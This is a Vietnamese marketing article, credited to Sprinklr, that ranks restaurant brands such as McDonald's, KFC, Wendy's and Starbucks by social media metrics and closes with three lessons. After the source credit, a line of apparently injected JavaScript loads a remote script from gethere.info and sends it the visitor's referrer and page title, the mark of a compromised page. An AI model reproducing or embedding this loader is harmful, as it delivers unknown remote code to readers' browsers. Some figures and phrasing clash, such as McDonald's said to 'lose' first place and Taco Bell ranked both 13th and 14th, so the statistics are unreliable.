Những thương hiệu thành công trong truyền thông xã hội

Kiểm toán kinh doanh xã hội là một ngành công nghiệp báo cáo những con số hàng tháng của những người, doanh nghiệp thành công trong xã hội. Theo một nghiên cứu Hiệp hội nhà hàng quốc gia năm 2013, 9 trong số 10 chủ nhà hàng cho biết phương tiện truyền thông xã hội sẽ càng ngày càng trở thành một chiến thuật tiếp thị quan trọng. 

Hơn nữa, 95% chủ nhà hàng nói rằng họ sẽ có mặt trên Facebook và 78% nói rằng họ sẽ có mặt trên Twitter vào năm 2015. Trong số các thương hiệu nhà hàng ngày nay, nhiều nhà hàng đang sử dụng các nền tảng khác nhau để phân biệt thương hiệu của mình và kết nối với người khách hàng. Và truyền thông xã hội đang được họ sử dụng để đạt được nhiều lợi thế hơn trong nghành công nghiệp đầy cạnh tranh trị giá 700 tỷ USD này. Vậy làm thế nào để xếp hạng được các nhà hàng? Các con số sẽ cho bạn biết ai là người thành công và những người vẫn còn cần cải tiến chiến lược của mình.

Những thương hiệu thành công trong truyền thông xã hội

Những thương hiệu được vinh danh

Những thương hiệu này là những thương hiệu đã đạt được thành công ở các số liệu cá nhân về lượng khách hàng cũng như có các chiến lược xã hội sáng tạo.

Những thương hiệu thành coogn trong truyền thông xã hội

Thu hút khách hàng

Đáng kinh ngạc là có đến 30% của gần 1 triệu người theo dõi và tương tác với các nội dung xã hội của – có nghĩa là trong một tháng có đến gần 300.000 người tương tác với thương hiệu này. Họ biết đâu là khách hàng cốt lõi của mình, và nhắm mục tiêu đến các tín đồ thể thao và những người yêu gà. Các hoạt động xã hội của các fan trung thành thậm chí còn được họ giới thiệu trên trang web của mình để tạo ra và nuôi dưỡng một cộng đồng của những người ủng hộ trung thành của thương hiệu.

Mặc dù lượng khách hàng trung thành của họ không có số lượng quá lớn nhưng Wingstop có cách giao tiếp rất hiệu quả với cộng đồng của họ, chứng tỏ một lượng khách hàng khổng lồ không phải là cách duy nhất để giành chiến thắng ở truyền thông xã hội.

Những thương hiệu thành công trong truyền thông xã hội 2

Muốn giành được ấn tượng của khách hàng? Hãy tạo ra những bài viết xứng đáng!

Domino tiếp tục ưu tiên truyền thông xã hội và truyền thông kỹ thuật số, với 228 triệu lượt khách hàng kiếm được – gấp hai lần mức trung bình của top 25 – giúp họ duy trì thị phần trong thị trường đầy cạnh tranh. Ngược lại với các chương trình khuyến mại trả tiền, ấn tượng từ cách truyền thông này là sự đánh giá cao của khách hàng với các nội dung truyền thông của Domino và chia sẻ nó trên các trang cá nhân của mình.

Nó chứng tỏ Domino không chỉ tạo ra được những nội dung tốt mà còn tìm được cho mình những người thay mặt mình tiếp thị cho thương hiệu. Đây là Chén Thánh để tiếp thị truyền thông xã hội và phản ánh một chiến lược truyền thông xã hội rất trưởng thành.

Sử dụng nội dung chất lượng để tạo cam kết

Wendy tạo ra một nội dung mà theo họ là khách hàng có thể tìm thấy giá trị từ đó và tương tác với nó, điều đó đã được đánh giá cao với 350.000 lượng tương tác, cao hơn so với đối thủ cạnh tranh của họ là Burger King 6%. Thương hiệu này giao tiếp với khách hàng của mình một cách giản dị và thân thiện, khuyến khích họ chia sẻ, retweet, và coi nó như bài viết của họ. Các khiếu nại từ khách hàng luôn được nhanh chóng giải quyết và tìm ra những phong cách cá nhân của từng người để đảm bảo mọi khách hàng đều có được những trải nghiệm tuyệt vời.

Điều thú vị là thương hiệu này đã có một trong những lượng bài đăng thấp nhất trong số các thương hiệu với chỉ 135 bài trong vòng 30 ngày. Đây là một trong những thương hiệu có số lượng bài viết thấp nhất nhưng lại có được sự gắn kết cao nhất mà bạn có thể thấy được ở đồ thị bên dưới. Wendy đã chứng minh rằng họ không phải mất quá nhiều bài viết để phát triển được một mối quan hệ mạnh mẽ với người tiêu dùng và kích hoạt những người ủng hộ trung thành.

Những thương hiệu thành công trong truyền thông xã hội 3

Tạo ấn tượng

Lượng người theo dõi lớn của Starbucks – gần 48 triệu người đã giúp hãng này có được một cơ hội lớn là đạt đến 73,8 triệu lượt hiển thị – cao hơn so với đối thủ cạnh tranh của họ là Dunkin Donuts tới gần 50%. Nội dung đa dạng nâng cao thương hiệu của họ và thúc đẩy được hình ảnh của hãng này trên thị trường quốc tế. Nhờ sự nổi tiếng của các món đồ uống như Pumpkin Spice Latte (#PSL) và chiến dịch “Meet Me at Starbucks” gần đây của họ, Starbucks luôn giữ được sự được phổ biến của mình trên mạng xã hội.

Ba thương hiệu đứng đầu

McDonald, KFC và Pizza Hut xếp hạng ở vị trí thứ 1, thứ 2 và thứ 3 trong tiêu chí tổng của truyền thông xã hội.

Những thương hiệu thành công trong truyền thông xã hội 4

McDonald là người chiến thắng

McDonald mất vị trí số một trên cả bảy chỉ số chính. Các thương hiệu thức ăn nhanh toàn cầu có gần 70 triệu người theo dõi trên tất cả các trang mạng – nhiều hơn 31 % so với Starbucks. Với 1,4 triệu người tương tác tích cực, 104,8 triệu lượt hiển thị, và 7748 bài viết thương hiệu trong 30 ngày, McDonald đã rất cố gắng để khuếch đại các hoạt động truyền thông xã hội của họ.

Trên trang mạng xã hội của mình, McDonald đẩy mạnh rút thăm trúng thưởng, báo cáo về sự tham gia của cộng đồng, và quảng cáo sản phẩm mới. Ngoài ra, thương hiệu này còn làm việc chăm chỉ để kết nối với người tiêu dùng và hình ảnh thương hiệu của họ như là một sự lựa chọn lành mạnh cho cả gia đình.

MacDonald đã từng thực hiện chiến dịch Q&A (hỏi và đáp), trả lời mọi câu hỏi của khách hàng về nguyên liệu, quy trình sản xuất, chuẩn bị các sản phẩm của mình. Họ cũng lắng nghe các mối quan tâm của người tiêu dùng về chất lượng sản phẩm của họ và thiết lập một đường dây thẳng (Domino cũng có một cách tiếp cận tương tự với chiến dịch minh bạch “Oh Yes We Did” trong năm 2010). Và cách tiếp cận này dường như đã có tác dụng.

Thương đứng hiệu thứ hai và thứ ba

KFC đứng ở vị trí thử 2, Pizza Hut đứng ở vị trí thứ 3 và Taco Bell xếp ở vị trí thứ 14 trong tổng thể.

KFC sau sát phía sau của McDonald ở vị trí thứ 2 tổng thể, vị trí thứ 2 trong số người quan tâm (694.000), số lượt hiển thị (422 triệu), được hiển thị (86,1 triệu), số người tham gia hoạt động (402.000), và người hoạt động tích cực (1,3 triệu). KFC sử dụng mạng xã hội để nhấn mạnh các thông điệp về giá trị gia đình của họ và thúc đẩy cung cấp sản phẩm cốt lõi của mình là gà chiên. KFC hoạt động để bảo vệ hình ảnh của mình thông qua những hành động nhanh chóng và minh bạch.

Pizza Hut xếp vị trí thứ 3 tổng thể, xếp hạng 3 trong số lượt hiển thị (280 triệu) và vị trí 5 trong số lượt được hiển thị (51 triệu), số người tham gia hoạt động (569.000), và người theo dõi (29 triệu). Họ ưu tiên các chiến dịch truyền thông xã hội và kỹ thuật số để làm nổi bật nhiều công thức nấu ăn mới. Nó là thương hiệu dẫn đầu với 17% thị phần, thương hiệu tận dụng tình yêu ám ảnh của khách hàng với pizza và khuyến khích các cuộc hội thoại.

Taco Bell! Thương hiệu này có mặt trong danh sách của chúng tôi ở vị trí 13 tổng thể và vị trí số 8 ở lượng người theo dõi (16 triệu). Thương hiệu này tập trung vào các khách hàng ở phân khúc mạng mới nổi như Snapchat và Vine.

Ba bài học mà bạn có thể rút ra

Chúng tôi đã rút ra được một số kết luận chung sau khi phân tích các con số:

  1. Hãy trực tiếp tương tác với khách hàng của bạn

Hầu hết các thương hiệu hàng đầu, chẳng hạn như của Applebee và Burger King, đang tham gia tương tác thường xuyên với khách hàng trên tất cả trang mạng. Dù là trả lời một câu hỏi về một sản phẩm mới hay tiếp cận với khách hàng, thương hiệu này chứng tỏ rằng việc tham gia vào mạng xã hội cùng với khách hàng của mình là rất quan trọng, bạn không nên ngồi bên lề các cuộc trò chuyện về thương hiệu của bạn. Khách hàng của bạn sẽ có được một kết nối cảm xúc mạnh mẽ hơn với thương hiệu của bạn và một số người ghét bạn có thể trở thành những người ủng hộ trung thành nhất của bạn.

  1. Chấp nhận rủi ro

Thương hiệu không nên sợ để phát triển các chiến lược truyền thông trên Instagram hay Pinterest mà xây dựng một nền tảng không đầy đủ trên các trang này. Dunkin ‘Donuts sử dụng Instagram để nâng cao thương hiệu của mình thông qua các nội dung trực quan và kết nối với một phân khúc mới của fan hâm mộ của họ. Thậm chí Taco bell còn mạo hiểm hơn, họ sử dụng các mạng thực sự mới nổi như Snapchat và Vine để kết nối với giới trẻ. Các thương hiệu này đã nhìn thấy giá trị trong việc thử nghiệm và sử dụng mạng xã hội.

  1. Hãy minh bạch

Một khi bạn có một lượng khách hàng đáng kể và chiến lược của bạn phù hợp với các hoạt động tiếp thị khác thì các cuộc đối thoại mở có thể được sử dụng để gây ảnh hưởng đến hình ảnh thương hiệu của bạn. Bạn có một nhà hàng thức ăn nhanh và muốn xây dựng một thương hiệu đồ ăn lành mạnh? Thương hiệu của bạn mắc phải một scandal và bạn muốn tìm cách để kết nối với cộng đồng của mình? Tham gia vào một cuộc đối thoại với những người quan tâm đến thương hiệu của bạn cho phép bạn thu xếp hình ảnh của bạn với chiến lược nội dung thương hiệu của bạn.

Nghành công nghiệp nhà hàng có được thành công chung lớn về mặt xã hội. Các chương trình khách hàng trung thành và rút thăm trúng thưởng tiếp tục chứng minh thành công của mình trong phân khúc này. Bất kể thương hiệu của bạn lớn hay nhỏ, thì việc minh bạch là rất quan trọng.

(Nguồn: Sprinklr)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Thảo luận

Bình luận